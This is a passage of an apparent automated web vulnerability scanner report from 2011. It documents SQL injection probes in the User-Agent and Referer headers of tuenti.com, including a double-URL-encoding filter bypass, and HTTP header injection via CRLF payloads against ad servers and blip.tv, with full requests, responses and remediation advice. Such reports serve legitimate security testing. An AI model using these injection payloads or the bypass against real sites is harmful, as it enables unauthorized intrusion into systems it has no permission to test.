GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:53 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:54 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
.call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl
...[SNIP]...
oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if (
...[SNIP]...

Request 2

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:54 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:55 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

1.4. http://www.tuenti.com/share [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /share HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:34 GMT
Content-Length: 39370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
.call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl
...[SNIP]...
oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if (
...[SNIP]...

Request 2

GET /share HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:35 GMT
Content-Length: 39369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

1.5. http://www.tuenti.com/share [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:49 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:50 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
.call(arguments)));}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, ["*DEPRECATED*"].concat(Array.prototype.slice.call(arguments)));}},/** * @param Object object */dir: function(object) {if(this._is_enabl
...[SNIP]...
oad correctly');TConsole.log('Possible reasons include (but are not limited to):');TConsole.log('- Missing load.trace() call at end of file');TConsole.log('- Syntax error in file');TConsole.log('- PHP exception/error thrown on page load. Check source of html response.');TConsole.log('Number of missing files:', loader.pending_list_length);TConsole.log('Missing files:');for (var i in loader.pending_list) {if (
...[SNIP]...

Request 2

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:51 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

2. HTTP header injection
There are 254 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://2822.v.fwmrm.net/ad/l/1 [cr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload 78564%0d%0a92caa119d03 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr=78564%0d%0a92caa119d03 HTTP/1.1
Host: 2822.v.fwmrm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; _sc="sg23001.1295482428.1295482477.28800.0.21,"; _auv="g23001~1.1295482477.0,13310.1295482477.0,^"; _uid="a104_5562153497824379009"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _wr="g23001"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g23001~1.1295483536.0,13310.1295483536.0,^";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295483280..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295482428.1295483536.28800.0.21,";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Location: 78564
92caa119d03

Content-Length: 0
Date: Thu, 20 Jan 2011 00:32:16 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209;path=/;httponly


2.2. http://ad.afy11.net/ad [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The value of the c request parameter is copied into the Location response header. The payload d31e9%0d%0a0f93aeeb63f was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /ad?c=EPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD+x8G9fs11dXeU4=!http://a.collective-media.net/jump/cm.martini/;sz=728x90;ord=3271752524?\d31e9%0d%0a0f93aeeb63f HTTP/1.1
Host: ad.afy11.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: f=AgECAAAAAAALqJELwX83TQyokQsDfjdN; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; a=AZ7s9B85IkyRNDgbVDU-vg;

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: AdifyServer
Location: http://a.collective-media.net/jump/cm.martini/;sz=728x90;ord=3271752524?\d31e9
0f93aeeb63f

P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"


2.3. http://ad.doubleclick.net/ad/N5371.150779.COLLECTIVEMEDIA/B5050596.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5371.150779.COLLECTIVEMEDIA/B5050596.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11f84%0d%0af74fcbd7a68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11f84%0d%0af74fcbd7a68/N5371.150779.COLLECTIVEMEDIA/B5050596.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11f84
f74fcbd7a68
/N5371.150779.COLLECTIVEMEDIA/B5050596.3:
Date: Thu, 20 Jan 2011 00:35:35 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/cm.martini/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.martini/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 86c2c%0d%0a7595e25e347 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /86c2c%0d%0a7595e25e347/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=cm;ord1=707118;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;ord=3271752524? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/86c2c
7595e25e347
/cm.martini/%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D40%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524:
Date: Thu, 20 Jan 2011 00:28:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/click [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c65d%0d%0ab34a39a2892 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c65d%0d%0ab34a39a2892;h=v8/3a95/0/0/%2a/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;~okv=;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=160x600;net=cm;ord1=881330;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;btg=cm.sports_l;~aopt=3/0/ef/0;~sscs=%3fhttp://www.coloradoski.com/Resorts/Southwest/?utm_source=collective160x60&utm_medium=banner&utm_content=pricepoint&utm_campaign=southwest HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c65d
b34a39a2892
;h=v8/3a95/0/0/*/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bn:
Date: Thu, 20 Jan 2011 00:35:33 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://blip.tv/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33d4f%0d%0a851ee4bbe60 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33d4f%0d%0a851ee4bbe60/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/33d4f
851ee4bbe60
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:05 GMT
X-Varnish: 344233096
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/33d4f
851ee4bbe60/">here</a
...[SNIP]...

2.7. http://blip.tv/about/api/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /about/api/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload abf8c%0d%0a91e5c00ccbd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /abf8c%0d%0a91e5c00ccbd/api/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/abf8c
91e5c00ccbd
/api/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:39:08 GMT
X-Varnish: 2146052139
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/abf8c
91e5c00ccbd/api/">her
...[SNIP]...

2.8. http://blip.tv/about/api/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /about/api/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 85f95%0d%0a5539f270833 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /about/85f95%0d%0a5539f270833/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/about/85f95
5539f270833
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 1498223378
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/about/85f95
5539f270833/">h
...[SNIP]...

2.9. http://blip.tv/blogs/list/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /blogs/list/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 43dfc%0d%0ad402f0a3916 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /43dfc%0d%0ad402f0a3916/list/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/43dfc
d402f0a3916
/list/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:39:07 GMT
X-Varnish: 1274888219
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/43dfc
d402f0a3916/list/">he
...[SNIP]...

2.10. http://blip.tv/blogs/list/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /blogs/list/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ef468%0d%0a5fd4684d734 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /blogs/ef468%0d%0a5fd4684d734/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/blogs/ef468
5fd4684d734
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:07 GMT
X-Varnish: 2146051924
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/blogs/ef468
5fd4684d734/">h
...[SNIP]...

2.11. http://blip.tv/careers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88e08%0d%0a14a8636d647 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88e08%0d%0a14a8636d647/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/88e08
14a8636d647
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 1498223396
Age: 0
Via: 1.1 varnish
Connection: close

